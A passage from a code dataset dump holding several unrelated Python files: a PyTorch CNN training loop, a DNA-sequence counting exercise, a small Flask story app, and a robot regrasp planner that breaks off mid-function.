= train_data, batch_size = BATCH_SIZE, shuffle = True, num_workers = 2 )\n#test_loader = Data.DataLoader(dataset = test_data, batch_size = BATCH_SIZE2, shuffle = False, num_workers = 2 )\n\n\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN, self).__init__()\n self.conv1 = nn.Sequential( \n nn.Dropout(p = DROPOUT_INITIAL),\n \n nn.Conv2d(L_FIRST, L_SECOND, 5, 1, 2),\n nn.Dropout(p = DROPOUT_MIDDLE_1),\n nn.ReLU(RELU), \n #nn.MaxPool2d(2), \n nn.BatchNorm2d(L_SECOND),\n\n nn.Conv2d(L_SECOND, L_THIRD, 5, 1, 2), \n nn.Dropout(p = DROPOUT_MIDDLE_1), \n nn.ReLU(RELU), \n #nn.MaxPool2d(2), \n nn.BatchNorm2d(L_THIRD), \n )\n \n self.conv2 = nn.Sequential( \n nn.Dropout(p = DROPOUT_INITIAL),\n \n nn.Conv2d(L_FIRST, L_SECOND, 3, 1, 1),\n nn.Dropout(p = DROPOUT_MIDDLE_2),\n nn.ReLU(RELU), \n #nn.MaxPool2d(2), \n nn.BatchNorm2d(L_SECOND),\n\n nn.Conv2d(L_SECOND, L_THIRD, 3, 1, 1), \n nn.Dropout(p = DROPOUT_MIDDLE_2), \n nn.ReLU(RELU), \n #nn.MaxPool2d(2), \n nn.BatchNorm2d(L_THIRD),\n ) \n \n self.classifier = nn.Sequential( \n \n #nn.AdaptiveMaxPool1d(L_FIFTH)\n nn.Dropout(DROPOUT_CLASSIFIER),\n nn.Linear(L_FIFTH,L_SIXTH),\n nn.ReLU(RELU), \n \n nn.Dropout(DROPOUT_CLASSIFIER),\n nn.Linear(L_SIXTH, L_SEVENTH),\n nn.ReLU(RELU),\n \n nn.Linear(L_SEVENTH, 10),\n )\n\n def forward(self, x): \n x1 = self.conv1(x) # branch 1\n x2 = self.conv2(x) # branch 2\n x3 = x1 + x2 # bring the branches together\n x4 = x3 + self.conv1(x)\n x5 = x3 + self.conv2(x)\n x = x4 + x5\n # a linear layer exppects a unidimensional vector of :\n # batch_size x channels x width x height\n x = x.view(x.size(0), -1) \n output = self.classifier(x)\n return output, x \n \n\ncnn = CNN()\n#print(cnn) # net architecture\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\nif torch.cuda.device_count() > 1:\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\")\n cnn = nn.DataParallel(cnn)\n\ncnn = torch.nn.DataParallel(cnn, device_ids=[0]).cuda()\ncnn.to(device)\ntrain_data, train_target = train_data.to(device), train_target.to(device) \ntest_data, test_target = test_data.to(device), test_target.to(device)\n\nloss_func = nn.CrossEntropyLoss()\n#loss_func = nn.NLLLoss()\n\noptimizer = torch.optim.Adam(cnn.parameters(), lr=LR)\n#optimizer = optim.SGD(cnn.parameters(), lr=LR, momentum=MM)\n\n# training \nfor epoch in range(EPOCH):\n loss = None\n for step, data in enumerate(train_loader,0):\n optimizer.zero_grad() # clear gradients for this training step \n output = cnn(train_data)[0] # cnn output\n loss = loss_func(output, train_target[0]) # calculate loss\n loss.backward() # backpropagation, compute gradients\n optimizer.step() # apply gradients\n\n if step % 50 == 0:\n test_output, last_layer = cnn(train_data)\n pred_y = torch.max(test_output, 1)[1]\n accuracy = torch.sum(pred_y == train_target[0]).type(torch.FloatTensor) / float(train_target.size(1))\n print('Epoch: ', epoch, ' | Error: %.3f' % loss.cpu().detach().numpy(),' | Training Accuracy: %.3f' % accuracy)\n\nlabel1 = torch.tensor([6431, 18449, 1899, 2864, 1145, 4829, 1130, 3482, 747]).type(torch.FloatTensor)\nlabel2 = torch.zeros(1,9)\n\nwith torch.no_grad():\n outputs = cnn(test_data)[0]\n _, predicted = torch.max(outputs, 1)\n predicted = predicted.to(device)\n\n c = (predicted == test_target[0]).squeeze()\n c = c.to(device)\n \nfor j in range (40976):\n if (c[j] == 1):\n label2[0,predicted[j]-1] += 1 \n \n \n#print('Correct classification in each class: ',label2)\npercent = (torch.sum(c).item()/TEST_SIZE)\nprint('Correct Classification (Percent): %.2f' % percent)\nprint('Results by classes: ',label2/label1)\n\nend.record()\n\n# Waits for everything to finish running\ntorch.cuda.synchronize()\n\nprint('Total execution time: ',start.elapsed_time(end))\n\ntorch.cuda.empty_cache()\n","sub_path":"all_code.py","file_name":"all_code.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"625161635","text":"# A. How many sequences are in that file?\n# B. How many have the pattern CTATA?\n# C. How many have more than 1000 bases?\n# D. How many have over 50% GC composition?\n# E. How many have more than 2000 bases and more than 50% GC composition?\n\n\nfilename = \"Chapter Specification/sequence.txt\"\n\n\n\ni = 0\nfor seq in open(filename):\n seq = seq.rstrip()\n i = i+1\n print(i,\" \",seq)\n\nprint(\"A.\", i, \"sequences are in that file.\")\n\n\n\ni = 0\nfor seq in open(filename):\n seq = seq.rstrip()\n pos = seq.find(\"CTATA\")\n if pos != -1:\n i=i+1\n \nprint(\"B.\", i, \"sequences have the pattern CTATA.\")\n\n\n\ni = 0\nfor seq in open(filename):\n seq = seq.rstrip()\n if len(seq) > 1000:\n i=i+1\n \nprint(\"C.\", i, \"sequences have more than 1000 bases.\")\n\n\n\ni = 0\nfor seq in open(filename):\n seq = seq.rstrip()\n num = seq.count(\"G\")+seq.count(\"C\")\n print(num)\n count = len(seq)\n num = num*1.0\n count = count*1.0\n if num/count*100.0 > 50:\n i=i+1\n \nprint(\"D.\", i, \"sequences have over 50% GC composition.\")\n\n\n\ni = 0\nfor seq in open(filename):\n seq = seq.rstrip()\n num = seq.count(\"GC\")\n count = len(seq)\n num = num*1.0\n count = count*1.0\n if num/count*100.0 > 50 and count > 2000:\n i=i+1\n \nprint(\"E.\", i, \"sequences have more than 2000 bases and over 50% GC composition.\")\n","sub_path":"3-2/CSE 3210 (Artificial Intelligence)/Lab Works by '15/Python All/13. If and Files - Exercise - 5.py","file_name":"13. If and Files - Exercise - 5.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"355047567","text":"from flask import Flask, request, render_template, redirect\nimport json\napp = Flask(__name__)\n\nurlCentreText = {\"0\" : \"Start your story\"}\n\n@app.route(\"/\")\ndef start():\n return redirect(\"0\")\n\n@app.route(\"/\", methods=[\"POST\", \"GET\"])\ndef story_page(url):\n global urlCentreText\n if request.method == \"POST\":\n if \"newUrl\" in request.form:\n urlCentreText[request.form[\"newUrl\"]] = request.form[\"cellInput\"]\n elif \"save\" in request.form:\n with open(\"savedStoryText.json\", \"w\") as outfile:\n json.dump(urlCentreText, outfile)\n elif \"load\" in request.form:\n with open(\"savedStoryText.json\") as json_data:\n urlCentreText = json.load(json_data)\n\n return render_template(\"storyTemplate.html\",\n url=url,\n dictionary=urlCentreText)\n\n@app.route(\"//storysofar\")\ndef story_so_far(url):\n urlList = []\n for x in range(1, len(url)):\n urlList.append(url[:x + 1])\n return render_template(\"storySoFar.html\",\n urlList=urlList,\n dictionary=urlCentreText)\n\n\n\n","sub_path":"story.py","file_name":"story.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"169677348","text":"'''A class for regrasp planning. Extends ideas in \"Regrasping\" by Tournassoud et al., 1987.'''\n\n# python\nfrom multiprocessing.connection import Client\n# scipy\nimport matplotlib\nfrom numpy.linalg import norm\nfrom scipy.spatial import cKDTree\nfrom numpy.random import randint, uniform\nfrom numpy import arccos, argmin, arange, array, ascontiguousarray, concatenate, cos, cross, \\\n dot, eye, exp, hstack, isnan, log, logical_and, logical_not, max, mean, minimum, nonzero, ones, \\\n pi, power, repeat, reshape, sum, tile, unique, vstack, where, zeros\n# openrave\nimport openravepy\n# self\nimport point_cloud\nimport c_extensions\nimport hand_descriptor\nfrom planner import Planner\nfrom hand_descriptor import HandDescriptor\n \nclass PlannerRegrasp(Planner):\n\n def __init__(self, env, temporaryPlacePosition, nGraspSamples, halfAngleOfGraspFrictionCone,\n nTempPlaceSamples, nGoalPlaceSamples, taskCostFactor, stepCost, segmUncertCostFactor,\n compUncertCostFactor, graspUncertCostFactor, placeUncertCostFactor, antipodalCostFactor,\n insignificantCost, maxSearchDepth, maxIterations, minPointsPerSegment, preGraspOffset):\n '''Initialize a regrasp planner.\n \n - Input env: EnvironmentPickPlace instance for visualization and collision checking.\n - Input temporaryPlacePosition: Obstacle-free position on the table where objects can safely\n be temporary placed for regrasping. 3-element numpy array.\n - Input nGraspSamples: Number of grasps to sample on each planning iteration.\n - Input halfAngleOfGraspFrictionCone: 0.5 * the solid angle (in radians) of the friction cone of\n between object surfaces and the gripper. Smaller values are more conservative, but will result\n in fewer grasp samples and thus longer planning times, longer plans, or fewer solutions.\n - Input nTempPlaceSamples: Number of temporary placements to sample on each planning iteration. \n - Input nGoalPlaceSamples: Number of goal placements to sample on each planning iteration.\n - Input taskCostFactor: Factor for the costs provied by the arrangement/task planner.\n - Input stepCost: The (scalar) plan cost for any grasp/place.\n - Input segmUncertCostFactor: Cost factor for uncertainty in object segmentation.\n - Input compUncertCostFactor: Cost factor for uncertainty in shape completion.\n - Input graspUncertCostFactor: Cost factor for grasping points with high completion uncertainty.\n - Input antipodalCostFactor: Cost factor penalizing large angles between the normal force and\n closing direction.\n - Input placeUncertCostFactor: Cost factor for placing on points with high completion uncertainty.\n - Input insignificantCost: A cost, if added to the final plan cost, is considered insignificant.\n This makes it possible to exit early if a plan cost exceeds a lower bound on the cost.\n - Input maxSearchDepth: Maximum plan length before restarting the search with additional grasp\n and place samples. This is an upper bound for plan length: if set too low, sometimes no\n solution will be found when solutions exist. Setting too low will also result in quickly\n sampling additional grasps / places. This value should (typically) be at least 4, i.e.,\n at least 1 temporary placement and regrasp.\n - Input maxIterations: Maximum number of sampling iterations for the regrasp planner. The\n regrasp planner may exit early if a lower bound on the cost is met.\n - Input minPointsPerSegment: Needed by Planner base class: a segment must have this many points\n to be considered an object.\n - Input preGraspOffset: Needed by Planner base class: pre-grasp is offset by this distance in\n negative approach direction.\n '''\n \n Planner.__init__(self, env, minPointsPerSegment, preGraspOffset)\n \n # input checking\n I = (int, long)\n if not isinstance(nGraspSamples, I) or not isinstance(nTempPlaceSamples, I) or \\\n not isinstance(nGoalPlaceSamples, I) or not isinstance(maxSearchDepth, I) or \\\n not isinstance(maxIterations, I):\n raise Exception(\"An integer parameter is not integer-valued.\")\n \n if nGraspSamples < 0:\n raise Exception(\"nGraspSamples be non-negative.\")\n \n if halfAngleOfGraspFrictionCone < 0 or halfAngleOfGraspFrictionCone > pi / 2.0:\n raise Exception(\"halfAngleOfGraspFrictionCone must be in [0, pi/2]\")\n \n if nTempPlaceSamples < 0 or nGoalPlaceSamples < 0:\n raise Exception(\"Place parameters must be non-negative.\") \n \n if taskCostFactor < 0 or stepCost < 0 or segmUncertCostFactor < 0 or compUncertCostFactor < 0 \\\n or graspUncertCostFactor < 0 or placeUncertCostFactor < 0 or antipodalCostFactor < 0 or \\\n insignificantCost < 0: raise Exception(\"Cost factors all assumed to be be non-negative.\")\n \n if maxSearchDepth < 0 or maxIterations < 0:\n raise Exception(\"Search parameters must be non-negative.\")\n \n # grasp parameters\n self.nGraspSamples = nGraspSamples\n self.halfAngleOfGraspFrictionCone = halfAngleOfGraspFrictionCone\n self.cosHalfAngleOfGraspFrictionCone = cos(halfAngleOfGraspFrictionCone)\n self.nominalDescriptor = HandDescriptor(eye(4)) # for hand dimensions\n self.handWidth = self.nominalDescriptor.width\n self.handDepth = self.nominalDescriptor.depth\n self.squareHandWidth = self.nominalDescriptor.width**2 # for quick grasp feasibility checking\n \n # place parameters\n self.nTempPlaceSamples = nTempPlaceSamples\n self.nGoalPlaceSamples = nGoalPlaceSamples\n self.temporaryPlacePosition = temporaryPlacePosition\n \n # cost factors\n self.taskCostFactor = taskCostFactor\n self.stepCost = stepCost\n self.segmUncertCostFactor = segmUncertCostFactor\n self.compUncertCostFactor = compUncertCostFactor\n self.graspCostFactor = graspUncertCostFactor\n self.placeCostFactor = placeUncertCostFactor\n self.antipodalCostFactor = antipodalCostFactor\n self.insignificantCost = insignificantCost\n \n # search parameters\n self.maxSearchDepth = maxSearchDepth \n self.maxIterations= maxIterations\n \n # internal variables (pre-sample grasps)\n self.preSampledClouds = []\n self.preSampledPairs = []\n self.preSampledBinormals = []\n self.preSampledGrasps = []\n \n # internal variables (continue planning)\n self.contTargObjs = []\n self.contUniqueTargObjs = []\n \n def Continue(self):\n '''TODO'''\n \n # load data saved from Plan\n targObjs = self.contTargObjs\n uniqueTargObjs = self.contUniqueTargObjs \n \n # continue each worker\n connections = []\n for i in xrange(len(uniqueTargObjs)):\n \n # send continue message to each worker\n message = [\"regrasp-continue\"]\n try:\n print(\"Continuing regrasp planning worker {}.\".format(i))\n connection = Client(('localhost', 7000 + i))\n except:\n for connection in connections: connection.close()\n raise Exception(\"Unable to connect to worker {}.\".format(i))\n connection.send(message)\n connections.append(connection)\n \n # wait for result\n pickPlaces = []; goalIdxs = []; costs = []; workerIdxs = []\n done = zeros(len(connections), dtype = 'bool')\n i = -1\n \n while not done.all():\n \n # check the next connection\n i = 0 if i + 1 == len(connections) else i + 1 \n \n # ignore connections that are done\n if done[i]: continue\n \n # if there is a result waiting, receive it\n if connections[i].poll(0.1): \n message = connections[i].recv()\n connections[i].close()\n purpose = message[0]\n data = message[1:]\n if purpose == \"regrasp-continue\":\n pickPlaces.append(data[0])\n goalIdxs.append(data[1])\n costs.append(data[2])\n workerIdxs.append(i)\n done[i] = True\n print(\"Worker {} completed with cost {}.\".format(i, costs[-1]))\n else:\n print(\"Warning: message had purpose {}\".format(message[0]))\n continue\n \n # send cancel if there is a solution\n if len(costs) > 0:\n try: connections[i].send([\"regrasp-continue-cancel\", min(costs)])\n except: print(\"Warning: failed to send cancel to worker {}.\".format(i))\n \n # return best result\n bestIdx = argmin(costs)\n print(\"Worker {} had best cost {} with object {}.\".format( \\\n workerIdxs[bestIdx], costs[bestIdx], uniqueTargObjs[workerIdxs[bestIdx]]))\n \n targObjIdx = uniqueTargObjs[workerIdxs[bestIdx]]\n goalIdx = where(targObjIdx == targObjs)[0][goalIdxs[bestIdx]]\n\n return pickPlaces[bestIdx], goalIdx, targObjIdx\n \n def ContinueWorker(self, connection):\n '''TODO'''\n \n # Load data saved from previous call to PlanWorker.\n \n cloud = self.contCloud\n normals = self.contNormals\n graspContacts = self.contGraspContacts\n graspBinormals = self.contGraspBinormals\n pointCosts = self.contPointCosts\n triangleNormals = self.contTriangleNormals\n supportingTriangles = self.contSupportingTriangles\n cloudCenter = self.contCloudCenter\n originalGoalPlaces = self.contOriginalGoalPlaces\n goalPlaces = self.contGoalPlaces\n goalCosts = self.contGoalCosts\n graspPlaceTable = self.contGraspPlaceTable\n grasps = self.contGrasps\n graspCosts = self.contGraspCosts\n tempPlaces = self.contTempPlaces\n placeCosts = self.contPlaceCosts\n obstacleCloudAtStart = self.contObstacleCloudAtStart\n obstacleCloudAtGoal = self.contObstacleCloudAtGoal\n \n # Search for plans.\n \n plan = []; cost = float('inf')\n \n nReachableStart = sum(graspPlaceTable[:, 0] > 0) if graspPlaceTable.shape[1] > 0 else 0\n nReachableGoal = sum(graspPlaceTable[:, 1 + len(tempPlaces):] > 0) \\\n if graspPlaceTable.shape[1] > 0 else 0\n \n for iteration in xrange(self.maxIterations):\n \n if len(plan) > 0: break # stop as soon as a plan is found\n \n if connection.poll():\n message = connection.recv()\n if message[0] == \"regrasp-continue-cancel\":\n print(\"Received cancel.\")\n self.SaveContinuationData(plan, cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces,\n goalCosts, graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts,\n obstacleCloudAtStart, obstacleCloudAtGoal)\n return [], None, float('inf')\n \n graspsNew, pairsNew = self.SampleGrasps(cloud, normals, graspContacts, graspBinormals)\n graspCostsNew = self.GetGraspCosts(cloud, normals, pointCosts, pairsNew)\n \n if nReachableStart > 0 and nReachableGoal > 0:\n tempPlacesNew, tempPlacesNewTriangles = self.SamplePlaces(cloud, supportingTriangles,\n triangleNormals, cloudCenter)\n tempPlaceCostsNew = self.GetPlaceCosts(pointCosts, tempPlacesNewTriangles)\n else:\n tempPlacesNew = []\n tempPlaceCostsNew = zeros(0)\n \n goalPlacesNew = originalGoalPlaces[len(goalPlaces) : len(goalPlaces) + \\\n self.nGoalPlaceSamples] if nReachableStart > 0 else []\n goalPlaceCostsNew = goalCosts[len(goalPlaces) : len(goalPlaces) + self.nGoalPlaceSamples] \\\n if nReachableStart > 0 else zeros(0)\n \n graspPlaceTable, placeTypes, grasps, graspCosts, tempPlaces, goalPlaces, placeCosts, \\\n nReachableStart, nReachableTemp, nReachableGoal = self.UpdateGraspPlaceTable(\n graspPlaceTable, grasps, graspsNew, graspCosts, graspCostsNew, tempPlaces, tempPlacesNew,\n goalPlaces, goalPlacesNew, placeCosts, tempPlaceCostsNew, goalPlaceCostsNew,\n obstacleCloudAtStart, obstacleCloudAtGoal)\n if nReachableStart == 0 or nReachableGoal == 0: continue\n \n plan, cost = self.SearchGraspPlaceGraph(graspPlaceTable, placeTypes, graspCosts, placeCosts)\n print(\"Iteration: {}. Regrasp plan: {}. Cost: {}.\".format(iteration, plan, cost))\n \n # Return result\n self.SaveContinuationData(plan, cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces, goalCosts,\n graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts, obstacleCloudAtStart,\n obstacleCloudAtGoal)\n pickPlaces, goalIdx = self.PlanToTrajectory(plan, grasps, tempPlaces, goalPlaces)\n return pickPlaces, goalIdx, cost\n \n def GetAntipodalPairsOfPoints(self, cloud, normals):\n '''Given a point cloud of an object with corresponding surface normals, computes \"antipodal\"\n pairs of points. See spatial antipodal grasps in \"A Mathematical Introduction to Robotic\n Manipulation\" by Murray, Li, and Sastry. This is a preprocessing step for sampling hand poses\n for antipodal grasps.\n \n - Input cloud: nx3 numpy array of points.\n - Input normals: nx3 numpy array of surface normals (assumes norm(normals, axis = 1) = 1).\n - Returns pairs: List of pairs of indices into cloud, indicating pairs of points which can form\n antipodal grasps, assuming the gripper is not in collision and makes contact with these points.\n - Returns binormals: List of unit vectors in direction of line connecting the corresponding\n point pairs. These are candidate hand closing directions.\n '''\n \n # Input checking \n \n if cloud.shape[0] != normals.shape[0]:\n raise Exception(\"Cloud with {} points does not match {} normals.\".format(\n cloud.shape[0], normals.shape[0]))\n \n if cloud.shape[1] != 3 or normals.shape[1] != 3:\n raise Exception(\"Cloud or normals not 3D.\")\n \n # Identify antipodal pairs of points.\n # A point pair is antipodal if the line drawn between them lies within both friction cones, i.e.\n # is within some threshold angle of the object's surface normal.\n \n # (Consider all pairs of points, in both directions.)\n i = reshape(tile(arange(cloud.shape[0]), cloud.shape[0]), (cloud.shape[0]**2, 1))\n j = reshape(repeat(arange(cloud.shape[0]), cloud.shape[0]), (cloud.shape[0]**2, 1))\n pairs = hstack((i, j)) \n \n # (Vectorize calculation of binormals for each pair of points in the cloud.)\n X = tile(cloud, (cloud.shape[0], 1))\n Y = repeat(cloud, cloud.shape[0], axis = 0)\n binormals = X - Y\n # remove pairs not containing distinct points ---\n binormalsLen = norm(binormals, axis = 1)\n uniquePointsInPair = binormalsLen > 0\n binormals = binormals[uniquePointsInPair]\n binormalsLen = binormalsLen[uniquePointsInPair]\n pairs = pairs[uniquePointsInPair]\n # --\n binormals = binormals / tile(reshape(binormalsLen, (binormals.shape[0], 1)), (1, 3))\n \n # (Vectorize antipodal check.)\n X = tile(normals, (normals.shape[0], 1))\n Y = repeat(normals, normals.shape[0], axis = 0)\n X = X[uniquePointsInPair]\n Y = Y[uniquePointsInPair]\n isAntipodal = logical_and(\\\n sum(+binormals * X, axis = 1) >= self.cosHalfAngleOfGraspFrictionCone, \\\n sum(-binormals * Y, axis = 1) >= self.cosHalfAngleOfGraspFrictionCone)\n pairs = pairs[isAntipodal]; binormals = binormals[isAntipodal]\n #print(\"Found {} antipodal pairs of points.\".format(len(pairs)))\n \n # Filter pairs which are too wide for the gripper.\n \n fits = sum(power(cloud[pairs[:, 0]] - cloud[pairs[:, 1]], 2), axis = 1) < self.squareHandWidth\n pairs = pairs[fits]\n binormals = binormals[fits] \n #print(\"{} pairs fit in gripper.\".format(len(pairs)))\n \n return pairs, binormals\n \n def GetCostLowerBound(self, cloud, normals, pointCosts, pointPairs, goalPlaceCosts):\n '''Computes a lower bound on the cost acheivable by a regrasp plan.\n \n - Input cloud: nx3 numpy array of points representing the object.\n - Input normals: nx3 numpy array of surface normals at the corresponding points in cloud\n (assumed to be normalized).\n - Input pointCosts: n-element numpy array of costs associated with each point.\n - Input pointPairs: mx2 integer numpy array, where, each row indexes a pair of points in cloud\n that could potentially form an antipodal grasp.\n - Input goalPlaceCosts: k-element list of task-relevant costs for each goal placement.\n - Returns: A (scalar) lower bound on the regrasp plan cost. (The regrasp plan cost is described\n in detail in the Notebook, proposal, paper, etc.)\n '''\n \n if pointPairs.size == 0:\n return float('inf') # no grasps possible\n \n if len(goalPlaceCosts) == 0:\n return float('inf') # no goal placements possible\n \n # there must be at least 2 steps, 2 grasps, and 1 goal\n graspCosts = self.GetGraspCosts(cloud, normals, pointCosts, pointPairs)\n return 2.0 * self.stepCost + 2.0 * min(graspCosts) + min(goalPlaceCosts) + self.insignificantCost\n \n def GetGraspCosts(self, cloud, normals, pointCosts, pointPairs):\n '''Given a pair of contact points for parallel-jaw grasps, find the step cost for each grasp.\n \n - Input cloud: nx3 numpy array of points representing the object.\n - Input normals: nx3 numpy array of surface normals at the corresponding points in cloud\n (assumed to be normalized).\n - Input pointCosts: n-element numpy array of costs associated with each point.\n - Input pointPairs: mx2 integer numpy array, where, each row indexes a pair of points in cloud\n that could potentially form an antipodal grasp.\n - Returns graspCosts: m-element numpy array, which is the estimated negative half log\n probability of grasp success. (Half because the search algorithm will penalize each grasp\n twice, once for the pick and once for the place.)\n '''\n \n # input checking\n if len(pointPairs) == 0:\n return zeros(0)\n \n if cloud.shape[0] != normals.shape[0]:\n raise Exception(\"Cloud with {} points does not match {} normals.\".format(\n cloud.shape[0], normals.shape[0]))\n \n if cloud.shape[0] != pointCosts.shape[0]:\n raise Exception(\"Cloud with {} points does not match {} point costs.\".format(\n cloud.shape[0], pointCosts.shape[0]))\n \n if cloud.shape[1] != 3 or normals.shape[1] != 3:\n raise Exception(\"Cloud or normals not 3D.\")\n \n if max(pointPairs) >= cloud.shape[0]:\n raise Exception(\"cloud has {} points, but pointPairs indices go up to {}.\".format(\n cloud.shape[0], max(pointPairs)))\n \n # uncertainty at contact points\n uncertaintyCost = 0.5 * self.graspCostFactor * sum(pointCosts[pointPairs], axis = 1)\n \n # antipodal cost\n if self.antipodalCostFactor > 0:\n \n binormals = cloud[pointPairs[:, 0], :] - cloud[pointPairs[:, 1], :]\n binormalsLen = norm(binormals, axis = 1)\n binormals /= tile(reshape(binormalsLen, (binormals.shape[0], 1)), (1, 3))\n N0 = normals[pointPairs[:, 0], :]; N1 = normals[pointPairs[:, 1], :]\n \n mu0 = arccos(minimum(sum(+binormals * N0, axis = 1), 1.0))\n mu1 = arccos(minimum(sum(-binormals * N1, axis = 1), 1.0))\n \n # With this cost, the friction cone is the random variable, centered on the given surface\n # normal with half angle uniformly distributed between 0 and pi.\n #cost0 = -log(1.0 - mu0, 1.0)) / pi)\n #cost1 = -log(1.0 - mu1, 1.0)) / pi)\n \n # With this cost, the angle between the normal and binormal is normally distributed (but\n # truncated between 0 and pi), and we can compute the probability it is outside the friction\n # cone using the truncated normal CDF.\n cost0 = -log(self.TruncatedNormalCdf(self.halfAngleOfGraspFrictionCone, mu0, 0.13, 0.00, pi))\n cost1 = -log(self.TruncatedNormalCdf(self.halfAngleOfGraspFrictionCone, mu1, 0.13, 0.00, pi))\n \n antipodalCost = 0.5 * self.antipodalCostFactor * (cost0 + cost1)\n \n else:\n antipodalCost = zeros(len(pointPairs))\n \n return uncertaintyCost + antipodalCost\n \n def GetPlaceCosts(self, pointCosts, triangles):\n '''Given points that contact the horizontal surface for a temporary placement, determines the\n cost of the placement.\n \n - Input pointCosts: n-element numpy array with costs for each point in the point nx3 point cloud.\n - Input triangles: kx3 integer numpy array where each row indexes a triple in point costs,\n corresponding to the contact points of a placement. (Output by SamplePlacements.)\n - Returns placeCosts: k-element numpy array with the cost for each triple of contact points,\n i.e., for each temporary placement to be evaluated.\n '''\n \n if triangles.shape[1] != 3:\n raise Exception(\"Triangles must be 3D.\")\n \n if max(triangles) >= pointCosts.shape[0]:\n raise Exception(\"pointCosts has {} elements, but triangle indices go up to {}.\".format(\n pointCosts.shape[0], max(triangles)))\n \n return 0.5 * self.placeCostFactor * sum(pointCosts[triangles], axis = 1)\n\n def GetPointCosts(self, segmClouds, compClouds, segmCorrectProbs, compCorrectProbs):\n '''Associates a cost with each point in the completed point clouds.\n \n - Input segmClouds: Result of object instance segmentation, i.e., a list of point clouds\n (m_i x 3 numpy arrays), one for each object.\n - Input compClouds: Shape completions for each object, i.e., list of n_i x 3 numpy arrays.\n - Input segmCorrectProbs: List of m_i, per-point segmentation correctness probabilities.\n - Input compCorrectProbs: List of n_i, per-point completion correctness probabilities.\n - Returns pointCosts: n_i non-negative costs for each point of each object.\n '''\n \n # input checking\n if len(compClouds) != len(segmClouds) or len(segmCorrectProbs) != len(segmClouds) or \\\n len(compCorrectProbs) != len(segmClouds):\n raise Exception(\"Inconsistent number of objects.\")\n \n pointCosts = []\n for i in xrange(len(segmClouds)):\n \n # associate segmentation probabilities with completion probabilities\n \n # (method 1: use average segmentation correctness probability)\n #associatedSegmCorrectProbs = ones(compCorrectProbs[i].size) * mean(segmCorrectProbs[i])\n \n # (method 2: use nearest segmentation correctness probability)\n tree = cKDTree(segmClouds[i])\n _, idx = tree.query(compClouds[i])\n associatedSegmCorrectProbs = segmCorrectProbs[i][idx]\n \n # convert correctness probabilities to costs\n pointCosts.append(-self.segmUncertCostFactor * log(associatedSegmCorrectProbs) - \\\n self.compUncertCostFactor * log(compCorrectProbs[i]))\n \n # debugging\n #self.env.PlotCloud(concatenate(compClouds), matplotlib.cm.viridis(exp(-concatenate(pointCosts))))\n #raw_input(\"Contact point probabilities.\")\n \n return pointCosts\n \n def Plan(self, segmClouds, segmCorrectProbs, compClouds, compCorrectProbs, normals, goalPoses,\n goalCosts, targObjs, obstaclesAtStart, obstaclesAtGoal):\n '''Runs PlanWorker for each object in parellel and returns the lowest-cost regrasp plan found.\n \n - Input segmClouds: Segmentation for each object.\n - Input segmCorrectProbs: Per-point segmentation correctness probability (for each object).\n - Input compClouds: Completed point cloud for each object.\n - Input compCorrectProbs: Per-point segmentation correctness probabiltiy (for each object).\n - Input normals: Surface normals for each completed point cloud.\n - Input goalPoses: A list of goal placements (transform of the object from its current pose).\n - Input goalCosts: The task cost associated with each goal pose.\n - Input targObjs: The index of the object associated with each goal pose.\n - Input obstaclesAtStart: Point cloud of obstacles at object's current location (for each goal\n pose). Assumed same for identical target objects.\n - Input obstaclesAtGoal: Point cloud of obstacles at object's goal location (for each goal\n pose). Assumed same for identical target objects.\n - Returns pickPlaces: Gripper poses for each pick/place in the regrasp plan.\n - Returns goalIdx: The index (in goalPoses, goalCosts, or targObjs) of the goal placement.\n - Returns targObjIdx: The index (in compClouds) of the object selected for manipulation.\n '''\n \n # input checking\n nObjects = len(segmCorrectProbs); nGoals = len(goalPoses)\n if len(segmCorrectProbs) != nObjects or len(compClouds) != nObjects or \\\n len(compCorrectProbs) != nObjects or len(normals) != nObjects:\n raise Exception(\"Inconsistent number of objects.\")\n if len(goalCosts) != nGoals or len(targObjs) != nGoals or len(obstaclesAtStart) != nGoals or \\\n len(obstaclesAtGoal) != nGoals:\n raise Exception(\"Inconsistent number of goals.\")\n if isnan(goalCosts).any(): raise Exception(\"Goal costs must be non-NaN.\")\n if min(goalCosts) < 0: raise Exception(\"Goal costs must be non-negative.\")\n \n # compute \"point costs\" and incorporate task cost factor\n pointCosts = self.GetPointCosts(segmClouds, compClouds, segmCorrectProbs, compCorrectProbs)\n for i in xrange(len(goalCosts)):\n goalCosts[i] *= self.taskCostFactor\n \n # get a list of objects to plan for\n uniqueTargObjs = unique(targObjs)\n \n # create a worker for each object\n connections = []; bestPossibleCosts = zeros(len(uniqueTargObjs))\n for i, targObj in enumerate(uniqueTargObjs):\n \n # pre-sample grasps if this hasn't been done yet\n hasPreSampled = False\n for j, preSampledCloud in enumerate(self.preSampledClouds):\n if compClouds[targObj] is preSampledCloud:\n hasPreSampled = True\n break\n if not hasPreSampled:\n self.PreSampleGraspsOnObjects(\n [compClouds[targObj]], [normals[targObj]], [pointCosts[targObj]], 0)\n j = 0\n \n # fetch pre-sampled grasps\n grasps = self.preSampledGrasps[j]\n graspContacts = self.preSampledPairs[j]\n graspBinormals = self.preSampledBinormals[j]\n graspCosts = self.preSampledGraspCosts[j]\n \n # get all of the goals and costs for this object\n finalPoses = [goalPoses[k] for k in xrange(len(targObjs)) if targObj == targObjs[k]]\n finalCosts = [goalCosts[k] for k in xrange(len(targObjs)) if targObj == targObjs[k]]\n startObstacles = [obstaclesAtStart[k] for k in xrange(len(targObjs)) if targObj == targObjs[k]]\n finalObstacles = [obstaclesAtGoal[k] for k in xrange(len(targObjs)) if targObj == targObjs[k]]\n finalCosts = array(finalCosts)\n \n # find the best possible cost for this object \n bestPossibleCosts[i] = 